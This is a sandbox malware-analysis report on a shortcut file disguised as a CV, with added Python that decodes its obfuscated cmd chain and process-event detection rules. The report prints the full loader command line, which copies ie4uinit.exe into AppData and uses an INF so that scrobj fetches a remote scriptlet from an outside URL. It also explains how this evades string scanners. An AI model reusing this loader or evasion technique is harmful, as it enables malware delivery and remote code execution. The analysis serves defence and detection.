

Windows Analysis Report
CV - David Rolls.lnk

Overview

General Information

Sample Name: CV - David Rolls.lnk
Analysis ID: 791689
MD5: ba88702ee0712536390562efecb979ad
SHA1: ef1c4d176780db656217bf33088dba7918acd30b
SHA256: 635c496fc044d519146f8e6e94b3d208803a5c2c00065c7e54c04f8276c1d049

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Checks if browser processes are running
Creates processes via WMI
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to create processes via WMI
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
Creates COM task schedule object (often to register a task for autostart)
Found evasive API chain (date check)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Uses the system / local time for branch decision (may execute only at specific dates)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Drops PE files
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • cmd.exe (PID: 724 cmdline: C:\Windows\System32\cmd.exe" /v /c set "Images97=si" && set "Images67=version" && set "Images38=d" && set "Images82=default" && set "Images4=init" && (for %h in (c) do @set "Images7=%~h") && set "Images62=e" && set "Images14=t" && set "Images12=." && (for %k in (a) do @set "Images32=%~k") && set "Images3=History" && call set "Images6=%Images3:~2,1%" && set "Images43=settings" && set "Images8=$w" && set "Images88=!Images12!inf" && set "Images58=ieu!Images4!!Images88!" && call !Images6!et "Images84=%!Images32!ppdata%\micro!Images6!oft\" && !Images6!et "Images00=!Images84!!Images58!" && (for %t in ("[!Images67!]" "signature = !Images8!indows nt$" "[!Images38!e!Images6!tinationdirs]" "C3D81=01" "!Images82!destdir=11" "[C3D81]" "ieu%Images15%!Images88!" "[FD48E1]" "sc\" "ro%Images95%j,NI,%Images81%%Images2%%Images2%p%Images66%%Images0%%Images0%davidrolls!Images12!%Images76%/aj55hg3eude" "[!Images82!in!Images6!tall.windows7]" "Un\" "Register\" "OCXs=FD48E1" "!Images38!elfil!Images62!s=C3D81" "[!Images6!!Images14!rings]" "Images2=t;Images26" "!Images6!ervicen!Images32!me=' '" "Images15=!Images4!" "Images27=%time%" "!Images6!hortsvcn!Images32!me=' '" "Images0=/" "Images95=b;Images08" "Images76=com" "Images66=:;Images03" "Images81=h" ) do @e!Images7!ho %~t)>"!Images00!" && !Images6!et "Images20=ie4u!Images4!.!Images62!xe" && call xcopy /Y /C /Q %win!Images38!ir%\!Images6!ystem32\!Images20! "!Images84!*" | set Images21=Strikes && !Images6!t!Images32!rt "" wmi!Images7! proce!Images6!s call !Images7!rea!Images14!e "!Images84!!Images20! -base!Images43!" | set "Images83=Venues Before Travis Crane Language Scientists Creatures Agencies Phases Copper Lands Loops Afraid Soldier Never Mounts Shine Direct Fluid Scene Invitations Ripple Prefers Fiscal Taste Bargains Brussels Feeds Thanks Features Seeks Relax Identify April Victory Limit Resemble Apple Hands Specs Festival Sport Trouble Supporters Erupt Winds Ketchup MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 4132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1792 cmdline: C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • xcopy.exe (PID: 4960 cmdline: xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" MD5: 6BC7DB1465BEB7607CBCBD7F64007219)
    • cmd.exe (PID: 1980 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set Images21=Strikes " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • cmd.exe (PID: 1240 cmdline: C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • WMIC.exe (PID: 4560 cmdline: wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
        • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1308 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set "Images83=Venues Before Travis Crane Language Scientists Creatures Agencies Phases Copper Lands Loops Afraid Soldier Never Mounts Shine Direct Fluid Scene Invitations Ripple Prefers Fiscal Taste Bargains Brussels Feeds Thanks Features Seeks Relax Identify April Victory Limit Resemble Apple Hands Specs Festival Sport Trouble Supporters Erupt Winds Ketchup"" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • ie4uinit.exe (PID: 5736 cmdline: C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings MD5: 9DD77F0F421AA9A70383210706ECA529)
    • ie4uinit.exe (PID: 5056 cmdline: C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache MD5: 9DD77F0F421AA9A70383210706ECA529)
      • rundll32.exe (PID: 1396 cmdline: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 5944 cmdline: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
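
The command line in the process tree is a cmd.exe /v (delayed expansion) script that assembles every word from one- and two-letter fragments, writes an INF file into %appdata%\microsoft\, copies the Microsoft-signed ie4uinit.exe out of System32 next to it, and launches that copy with -basesettings through WMI. The crypto-API and PDB evidence further down therefore describes ie4uinit.exe itself, a copied Windows binary, not attacker code. The script below, an added example and not part of the Joe Sandbox report, recovers the INF statically by emulating only the cmd semantics the chain relies on (parse-time %-expansion that leaves undefined names literal, !delayed! expansion, the extra %-expansion performed by call, and for/echo redirection) and then applying standard INF rules (backslash line continuation, ';' comments, [strings] substitution). The environment values for %appdata%, %windir% and %time% are assumptions chosen to match the paths shown in the tree.

```python
import re

# Argument string of the LNK's cmd.exe (everything after "/v /c"), copied verbatim
# from the process tree in the report.
CMDLINE = r'''set "Images97=si" && set "Images67=version" && set "Images38=d" && set "Images82=default" && set "Images4=init" && (for %h in (c) do @set "Images7=%~h") && set "Images62=e" && set "Images14=t" && set "Images12=." && (for %k in (a) do @set "Images32=%~k") && set "Images3=History" && call set "Images6=%Images3:~2,1%" && set "Images43=settings" && set "Images8=$w" && set "Images88=!Images12!inf" && set "Images58=ieu!Images4!!Images88!" && call !Images6!et "Images84=%!Images32!ppdata%\micro!Images6!oft\" && !Images6!et "Images00=!Images84!!Images58!" && (for %t in ("[!Images67!]" "signature = !Images8!indows nt$" "[!Images38!e!Images6!tinationdirs]" "C3D81=01" "!Images82!destdir=11" "[C3D81]" "ieu%Images15%!Images88!" "[FD48E1]" "sc\" "ro%Images95%j,NI,%Images81%%Images2%%Images2%p%Images66%%Images0%%Images0%davidrolls!Images12!%Images76%/aj55hg3eude" "[!Images82!in!Images6!tall.windows7]" "Un\" "Register\" "OCXs=FD48E1" "!Images38!elfil!Images62!s=C3D81" "[!Images6!!Images14!rings]" "Images2=t;Images26" "!Images6!ervicen!Images32!me=' '" "Images15=!Images4!" "Images27=%time%" "!Images6!hortsvcn!Images32!me=' '" "Images0=/" "Images95=b;Images08" "Images76=com" "Images66=:;Images03" "Images81=h" ) do @e!Images7!ho %~t)>"!Images00!" && !Images6!et "Images20=ie4u!Images4!.!Images62!xe" && call xcopy /Y /C /Q %win!Images38!ir%\!Images6!ystem32\!Images20! "!Images84!*" | set Images21=Strikes && !Images6!t!Images32!rt "" wmi!Images7! proce!Images6!s call !Images7!rea!Images14!e "!Images84!!Images20! -base!Images43!" | set "Images83=Venues Before Travis Crane Language Scientists Creatures Agencies Phases Copper Lands Loops Afraid Soldier Never Mounts Shine Direct Fluid Scene Invitations Ripple Prefers Fiscal Taste Bargains Brussels Feeds Thanks Features Seeks Relax Identify April Victory Limit Resemble Apple Hands Specs Festival Sport Trouble Supporters Erupt Winds Ketchup"
'''.strip()

# Environment the emulation assumes; cmd would take these from the real session.
# User and drive match the paths in the tree, %time% is an arbitrary placeholder.
ENV = {"appdata": r"C:\Users\user\AppData\Roaming", "windir": r"C:\Windows", "time": "12:00:00.00"}

PERCENT = re.compile(r"%(\w+)(?::~(-?\d+),(-?\d+))?%")  # %name% or %name:~start,len%
DELAYED = re.compile(r"!(\w+)!")                          # !name!, enabled by cmd /v


def expand_percent(s, env):
    """cmd %-expansion. Undefined names stay literally in place, which is how the
    LNK smuggles %ImagesNN% tokens into the INF for a second, INF-side expansion."""
    def sub(m):
        name = m.group(1).lower()
        if name not in env:
            return m.group(0)
        if m.group(2) is not None:  # substring form %name:~start,len%
            start, length = int(m.group(2)), int(m.group(3))
            return env[name][start:start + length]
        return env[name]
    return PERCENT.sub(sub, s)


def expand_delayed(s, env):
    """!name! expansion, done when each statement executes (so earlier sets are visible)."""
    return DELAYED.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), s)


def run(stmt, env, files, actions):
    """Execute one &&/|-separated statement against the emulated environment."""
    stmt = expand_delayed(stmt, env)
    if stmt.startswith("call "):  # call re-parses its arguments: a second %-expansion
        stmt = expand_percent(stmt[5:], env)
    m = re.fullmatch(r'\(?for %(\w) in \((\w+)\) do @set "(\w+)=%~\1"\)?', stmt)
    if m:  # for-loop whose only purpose is to assign one letter
        env[m.group(3).lower()] = m.group(2)
        return
    m = re.fullmatch(r'\(?for %(\w) in \((.*)\) do @echo %~\1\)>"(.*)"', stmt)
    if m:  # echo every quoted token, one per line, into the redirected file
        files[m.group(3)] = "\n".join(re.findall(r'"([^"]*)"', m.group(2)))
        return
    m = re.fullmatch(r'set "?(\w+)=(.*?)"?', stmt)
    if m:
        env[m.group(1).lower()] = m.group(2)
        return
    actions.append(stmt)  # anything else would spawn an external process


def emulate(cmdline=CMDLINE, base_env=ENV):
    """Return (variables, files written, external commands) after running the chain."""
    env, files, actions = dict(base_env), {}, []
    line = expand_percent(cmdline, env)  # phase-1 expansion of the whole line, before any set runs
    for stmt in re.split(r"\s*(?:&&|\|)\s*", line):
        run(stmt, env, files, actions)
    return env, files, actions


def decode_inf(text):
    """Minimal INF reader: join backslash-continued lines, drop ';' comments,
    group by [section] and substitute %token% values defined in [strings]."""
    lines, pending = [], ""
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].rstrip()
        if line.endswith("\\"):
            pending += line[:-1]
            continue
        lines.append(pending + line)
        pending = ""
    sections, current = {}, None
    for line in lines:
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections[current] = []
        elif current is not None and line:
            sections[current].append(line)
    strings = {}
    for entry in sections.get("strings", []):
        key, _, value = entry.partition("=")
        strings[key.strip().lower()] = value.strip()
    expand = lambda s: re.sub(r"%(\w+)%", lambda m: strings.get(m.group(1).lower(), m.group(0)), s)
    return {name: [expand(e) for e in entries] for name, entries in sections.items()}


if __name__ == "__main__":
    env, files, actions = emulate()
    for path, text in files.items():
        print(path, decode_inf(text), sep="\n")
    print(*actions, sep="\n")
```

Run stand-alone, the emulation reproduces the xcopy and wmic command lines seen in the tree and writes ieuinit.inf beside the copied binary. Decoded, [defaultinstall.windows7] becomes UnRegisterOCXs=FD48E1 plus delfiles=C3D81, and [FD48E1] becomes scrobj,NI,http://davidrolls.com/aj55hg3eude: an advpack OCX entry whose I flag requests DllInstall, so scrobj.dll receives the URL much as regsvr32 /n /i:<url> scrobj.dll would, while DelFiles removes ieuinit.inf from its source directory afterwards. Two layers of substitution (cmd leaves %ImagesNN% literal, the INF [strings] section resolves it) plus backslash continuation are what keep "scrobj" and "UnRegisterOCXs" out of the LNK as contiguous strings, so string-based LNK scanners that do not emulate both layers miss them.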
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched
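
No Sigma rule matched, but the process tree carries several signals a process-creation rule can key on: ie4uinit.exe running from a user profile instead of System32, -basesettings on that relocated copy, xcopy of a System32 binary into AppData, WMIC used as a process launcher, and a cmd.exe /v line built from dozens of set "X=" fragments. The rules below are an added example, not Joe Sandbox or Sigma output, and run over constructed process events modelled on the tree (PIDs, images and command lines as shown there; the parent images, the wbem\WMIC.exe path and the benign control event are assumptions made for the example).

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (the fields a Sysmon event 1 or EDR row carries)."""
    pid: int
    image: str
    command_line: str
    parent_image: str


# Constructed events modelled on the process tree above. PIDs, images and command lines
# follow the tree; the parent images, the wbem\WMIC.exe path and the last (benign) event
# are assumptions made for the example.
EVENTS = [
    ProcEvent(724, r"C:\Windows\System32\cmd.exe",
              r'C:\Windows\System32\cmd.exe /v /c set "Images97=si" && set "Images67=version" && set "Images38=d" '
              r'&& set "Images82=default" && set "Images4=init" && (for %h in (c) do @set "Images7=%~h") '
              r'&& set "Images62=e" && set "Images14=t" && set "Images12=." && set "Images3=History" '
              r'&& call set "Images6=%Images3:~2,1%" && set "Images43=settings" && set "Images8=$w"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(4960, r"C:\Windows\System32\xcopy.exe",
              r'xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(4560, r"C:\Windows\System32\wbem\WMIC.exe",
              r'wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(5736, r"C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe",
              r"C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings",
              r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    ProcEvent(9999, r"C:\Windows\System32\ie4uinit.exe",  # benign control: the real binary, in place
              r"C:\Windows\System32\ie4uinit.exe -ClearIconCache",
              r"C:\Windows\System32\cmd.exe"),
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def image_name(ev):
    return ev.image.rsplit("\\", 1)[-1].lower()


def ie4uinit_relocated(ev):
    """ie4uinit.exe executing from anywhere but System32/SysWOW64: a copied LOLBin."""
    return image_name(ev) == "ie4uinit.exe" and not ev.image.lower().startswith(SYSTEM_DIRS)


def ie4uinit_basesettings_user_path(ev):
    """-BaseSettings makes ie4uinit.exe process the ieuinit.inf beside it; from a
    user-writable directory that INF is attacker-controlled."""
    return ie4uinit_relocated(ev) and re.search(r"-basesettings\b", ev.command_line, re.I) is not None


def lolbin_copied_to_profile(ev):
    """xcopy/copy of ie4uinit.exe out of System32 into a user profile (staging)."""
    cl = ev.command_line.lower()
    return image_name(ev) in ("xcopy.exe", "cmd.exe") and "\\system32\\ie4uinit.exe" in cl and "\\appdata\\" in cl


def wmic_process_create(ev):
    """WMIC as a process launcher: the child appears under WmiPrvSE, breaking the cmd lineage."""
    return image_name(ev) == "wmic.exe" and re.search(r"process\s+call\s+create", ev.command_line, re.I) is not None


def cmd_delayed_expansion_obfuscation(ev, min_sets=8):
    """cmd.exe /v with a long run of set "X=..." fragments: the string-splitting style of the LNK."""
    cl = ev.command_line
    return (image_name(ev) == "cmd.exe"
            and re.search(r"\s/v\b", cl, re.I) is not None
            and len(re.findall(r'\bset "\w+=', cl, re.I)) >= min_sets)


RULES = {f.__name__: f for f in (ie4uinit_relocated, ie4uinit_basesettings_user_path,
                                 lolbin_copied_to_profile, wmic_process_create,
                                 cmd_delayed_expansion_obfuscation)}


def detect(events):
    """Map pid -> list of rule names that fired, in RULES order."""
    hits = {}
    for ev in events:
        matched = [name for name, rule in RULES.items() if rule(ev)]
        if matched:
            hits[ev.pid] = matched
    return hits


if __name__ == "__main__":
    for pid, names in detect(EVENTS).items():
        print(pid, ", ".join(names))
```

The relocated-ie4uinit rule is the high-fidelity one: the binary has no business executing outside System32, so it needs no tuning. The set-count threshold in the cmd rule is a knob; administrative batch files also chain set statements, so on real telemetry pair it with the LNK parent (explorer.exe) or with /v on the command line, as done here, before alerting.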



AV Detection

Source: CV - David Rolls.lnk  Virustotal: Detection: 9%
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319D7AC8 CertOpenStore,CertFindCertificateInStore,CryptImportPublicKeyInfo,GetLastError,GetLastError,CertFreeCertificateContext,CertCloseStore,9_2_00007FF7319D7AC8
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319D56A4 CryptBinaryToStringA,CryptBinaryToStringA,GetLastError,GetLastError,9_2_00007FF7319D56A4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319DEA9C memcpy_s,CryptCreateHash,CryptHashData,CryptDeriveKey,GetLastError,GetLastError,GetLastError,CryptDestroyHash,GetLastError,GetLastError,GetLastError,9_2_00007FF7319DEA9C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319D763C CryptStringToBinaryW,CryptStringToBinaryW,GetLastError,GetLastError,GetLastError,GetLastError,9_2_00007FF7319D763C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319D25C0 CryptAcquireContextW,CryptReleaseContext,9_2_00007FF7319D25C0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319D7DCC memset,CryptHashCertificate,memcmp,GetLastError,9_2_00007FF7319D7DCC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319DED98 memcpy_s,memcpy_s,CryptGenRandom,memcpy_s,EnterCriticalSection,LeaveCriticalSection,GetLastError,GetLastError,GetLastError,9_2_00007FF7319DED98
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319DE950 CryptImportPublicKeyInfo,GetLastError,GetLastError,GetLastError,CertFreeCertificateContext,CryptGetKeyParam,GetLastError,GetLastError,GetLastError,9_2_00007FF7319DE950
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319D2550 CryptReleaseContext,9_2_00007FF7319D2550
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319D74BC CryptCreateHash,CryptSetHashParam,CryptVerifySignatureW,GetLastError,CryptDestroyKey,GetLastError,CryptDestroyHash,GetLastError,9_2_00007FF7319D74BC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319DF108 CryptSetKeyParam,memcpy_s,CryptEncrypt,memcpy_s,CryptEncrypt,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,9_2_00007FF7319DF108
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319D544C strnlen,isalnum,CryptStringToBinaryA,CryptStringToBinaryA,GetLastError,GetLastError,9_2_00007FF7319D544C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319D73D0 CryptCreateHash,CryptHashData,CryptGetHashParam,GetLastError,CryptDestroyHash,GetLastError,9_2_00007FF7319D73D0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319DEFAC CryptCreateHash,memset,CryptSetHashParam,CryptHashData,CryptGetHashParam,GetLastError,GetLastError,GetLastError,CryptDestroyHash,GetLastError,GetLastError,GetLastError,9_2_00007FF7319DEFAC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319DE80C CryptGenRandom,memcpy_s,CryptEncrypt,GetLastError,GetLastError,GetLastError,GetLastError,9_2_00007FF7319DE80C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319DEBE0 CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_00007FF7319DEBE0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319DE750 CryptAcquireContextW,GetLastError,GetLastError,GetLastError,9_2_00007FF7319DE750
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe  Code function: 9_2_00007FF7319D2B50 CryptGenRandom,GetLastError,SysFreeString,9_2_00007FF7319D2B50
Source: Binary string: ie4uinit.pdbGCTL source: xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr
Source: Binary string: ie4uinit.pdb source: xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr